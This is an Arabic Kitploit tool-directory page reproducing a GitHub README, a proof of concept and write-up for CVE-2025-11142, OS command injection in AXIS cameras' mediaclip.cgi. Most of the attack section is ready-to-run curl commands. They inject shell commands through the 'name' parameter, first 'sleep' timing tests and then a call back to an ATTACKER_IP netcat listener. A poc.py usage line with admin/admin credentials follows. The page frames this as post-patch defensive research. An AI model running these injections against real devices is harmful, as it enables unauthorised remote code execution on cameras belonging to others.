Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-11142-axis-mediaclip-rce — إثبات المفهوم والتحليل الفني لـ CVE-2025-11142، وهي ثغرة حقن أوامر نظام تشغيل موثّقة في AXIS VAPIX mediaclip.cgi، مع طرق تحقق قائمة على الوقت وخارج النطاق. | Kitploit
أدوات/GitHubGitHub/kemrec/cve-2025-11142-axis-mediaclip-rce
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubkemrec/cve-2025-11142-axis-mediaclip-rce

cve-2025-11142-axis-mediaclip-rce

إثبات المفهوم والتحليل الفني لـ CVE-2025-11142، وهي ثغرة حقن أوامر نظام تشغيل موثّقة في AXIS VAPIX mediaclip.cgi، مع طرق تحقق قائمة على الوقت وخارج النطاق.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 12س 9دلم تتم المراجعة بعد

CVE-2025-11142 — حقن أوامر نظام التشغيل في mediaclip.cgi من AXIS

كتابة بحثية وPoC بعد التصحيح (n-day) — تحليل تقني بعد التصحيح لثغرة حقن أوامر نظام التشغيل بتصنيف CVSS 7.1 في واجهة برمجة تطبيقات وسائط VAPIX من AXIS، تم اكتشافها والتحقق منها بشكل مستقل عبر اختبار الصندوق الأسود ضد جهاز Axis.

النشرة الرسمية من Axis لا تنشر تفاصيل تقنية حول الاستغلال أو PoC عام ("لن تقدم Axis معلومات أكثر تفصيلاً حول الثغرة"، "لا توجد استغلالات معروفة علنًا" كما في تاريخ نشر النشرة). يوثّق هذا المستودع تأكيدًا مستقلًا ومبنيًا على الأدلة، نُشر فقط بعد أن أصبح إصلاح البائع (AXIS OS 12.7.36) متاحًا بشكل عام. انظر الجدول الزمني للإفصاح.

الملخص

معرف CVECVE-2025-11142
CWECWE-78 (حقن أوامر نظام التشغيل)
CVSS7.1 (عالية)
المتأثرAXIS OS 12.6.54 – 12.7.35
تم الإصلاح فيAXIS OS 12.7.36 (المسار النشط)
نشرة البائعhttps://www.axis.com/dam/public/18/0e/90/cve-2025-11142pdf-en-US-519291.pdf
NVDhttps://nvd.nist.gov/vuln/detail/CVE-2025-11142
الصلاحيات المطلوبةمشغّل/مسؤول مصادق (مصادقة VAPIX HTTP Digest)
الأثر المُتحقق منه هناتنفيذ أوامر نظام تشغيل عشوائية بحساب خدمة منخفض الصلاحيات (وليس root)

الثغرة

يقبل نقطة النهاية /axis-cgi/mediaclip.cgi من VAPIX طلب action=update مع معامل name نصي حر (اسم العرض للمقطع). يُظهر اختبار الصندوق الأسود أن هذه القيمة تُمرَّر، دون تنقية، إلى استدعاء شل على الجهاز — على الأرجح كجزء من خطوة إعادة تسمية/معالجة داخلية لنظام المقاطع الفرعي للوسائط.

لا توجد كتابة تقنية عامة تصف مسار الكود الدقيق في جانب الخادم (لم تنشر Axis واحدة)، لذا فإن السبب الجذري أدناه مُستنتج من سلوك الصندوق الأسود، وليس من مراجعة المصدر.

إثبات الثغرة

تستخدم جميع الطلبات مصادقة HTTP Digest (يرفض الجهاز مصادقة Basic). استبدل TARGET وUSER وPASS بقيم جهاز المختبر الخاص بك — لا تستخدم بيانات الاعتماد المثال ضد جهاز لا تملكه أو غير مخوّل لاختباره.

1. شرط مسبق — التأكد من وجود فتحة المقطع 0

يتطلب إجراء update مقطعًا موجودًا. إذا لم تكن الفتحة 0 موجودة بعد، ارفع عنصرًا نائبًا صغيرًا وغير ضار أولاً:

root@kitploit:~
curl -s --digest -u "$USER:$PASS" --anyauth \
  -X POST "http://$TARGET/axis-cgi/mediaclip.cgi?action=upload&media=audio&name=testclip" \
  -F "[email protected];type=audio/wav"

أي ملف WAV صغير صالح يعمل لـ poc.wav (ترويسة RIFF/WAVE دنيا كافية).

2. تأكيد أعمى قائم على الوقت

root@kitploit:~
# خط الأساس / التحكم — بدون تأخير محقون
curl -s --digest -u "$USER:$PASS" --anyauth -w "\n[HTTP:%{http_code} TIME:%{time_total}s]" -G \
  "http://$TARGET/axis-cgi/mediaclip.cgi" \
  --data-urlencode "action=update" \
  --data-urlencode "clip=0" \
  --data-urlencode "name=test;sleep 0;"

# تأخير محقون لمدة 8 ثوانٍ
curl -s --digest -u "$USER:$PASS" --anyauth -w "\n[HTTP:%{http_code} TIME:%{time_total}s]" -G \
  "http://$TARGET/axis-cgi/mediaclip.cgi" \
  --data-urlencode "action=update" \
  --data-urlencode "clip=0" \
  --data-urlencode "name=test;sleep 8;"

وقت الاستجابة الذي يتتبع مدة sleep المحقونة (بدلاً من خط الأساس ~0.3 ثانية) يؤكد أن الشل ينفذ قيمة name بالكامل، وليس مجرد معاملتها كسلسلة خاملة. تم التحقق من ذلك بتأخيرات متعددة ومقاسة بشكل مستقل (0ث / 3ث / 6ث / 8ث) وصيغ حقن متعددة (;، &&، backticks، $(...)) لاستبعاد الصدفة.

3. استدعاء شبكة خارج النطاق (أقوى إثبات)

نظرًا لأن جسم استجابة HTTP لا يعكس أبدًا مخرجات الأوامر (OK / Updating=0 بغض النظر عن الحمولة)، فإن التأكيد الأكثر إقناعًا يستخدم قدرة الشبكة الصادرة للجهاز نفسه. ابدأ مستمعًا على مضيف يتحكم به المهاجم واجعل الأمر المحقون يتصل به:

root@kitploit:~
# على مضيف المهاجم:
nc -lvnp 4444

# الحمولة المحقونة:
curl -s --digest -u "$USER:$PASS" --anyauth -G "http://$TARGET/axis-cgi/mediaclip.cgi" \
  --data-urlencode "action=update" \
  --data-urlencode "clip=0" \
  --data-urlencode "name=test;curl http://ATTACKER_IP:4444/rce_confirmed;"

طلب HTTP وارد حقيقي من عنوان IP للجهاز المستهدف، يحتوي على سلسلة User-Agent الخاصة بـ curl، هو إثبات لا لبس فيه لتنفيذ كود عن بُعد — الطلب يمكن أن ينشأ فقط من أمر تم تنفيذه فعليًا على الجهاز.

4. التنظيف

root@kitploit:~
curl -s --digest -u "$USER:$PASS" --anyauth "http://$TARGET/axis-cgi/mediaclip.cgi?action=remove&clip=0"

poc.py

انظر poc.py للحصول على سكربت مستقل يقوم بأتمتة الخطوات 1–4 ضد هدف تحدده في سطر الأوامر.

root@kitploit:~
usage: poc.py --target 192.168.1.100 --user admin --pass admin --callback-ip 192.168.1.50 [--callback-port 4444]

الأثر

  • مؤكد: تنفيذ أوامر عشوائية بحساب خدمة غير root بعد الوصول المصادق.
  • غير مؤكد (خارج نطاق هذا البحث): تصعيد الصلاحيات المحلي من حساب الخدمة إلى root. لم يتم متابعة أي ثنائيات SUID أو مسارات تصعيد إضافية بعد التعداد السلبي.
  • عوامل خطر واقعية تزيد من هذا الاكتشاف في الميدان: أجهزة Axis تُنشر غالبًا ببيانات اعتماد مسؤول افتراضية أو ضعيفة، وتطبيق SPA بالكامل في جانب العميل (الذي يحدد سطح واجهة VAPIX API بالكامل، بما في ذلك هذه النقطة) يُقدَّم بدون مصادقة، مما يجعل النقطة الضعيفة قابلة للاكتشاف بسهولة.

الجدول الزمني للإفصاح

  • تم تعيين CVE-2025-11142 علنًا ونشر نشرة البائع بواسطة Axis (التاريخ وفقًا لسجل NVD/البائع — انظر الروابط أعلاه).
  • إصلاح البائع متاح في AXIS OS 12.7.36 (المسار النشط) قبل نشر هذا المستودع.
  • نُشر هذا المستودع ككتابة بحثية n-day (بعد التصحيح)، تعيد إنتاج وتوثيق سلوك الثغرة بشكل مستقل لأغراض دفاعية/كشفية، بمجرد توفر الإصلاح بشكل عام. لا يتم كشف أي تفاصيل 0-day تتجاوز ما يكشفه تعيين CVE بالفعل (حقن أوامر CWE-78 في mediaclip.cgi) هنا ولم تؤكده Axis بالفعل.

الاستخدام المسؤول

يُقدَّم هذا الكود لأغراض اختبار الأمان المصرح به، والبحث الأمني، والأغراض الدفاعية فقط (مثل التحقق من تحديث أسطولك الخاص، أو بناء توقيعات كشف). لا تستخدمه ضد أجهزة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلف(ون) أي مسؤولية عن سوء الاستخدام.

الترخيص

MIT — انظر LICENSE.

تنزيل الأداة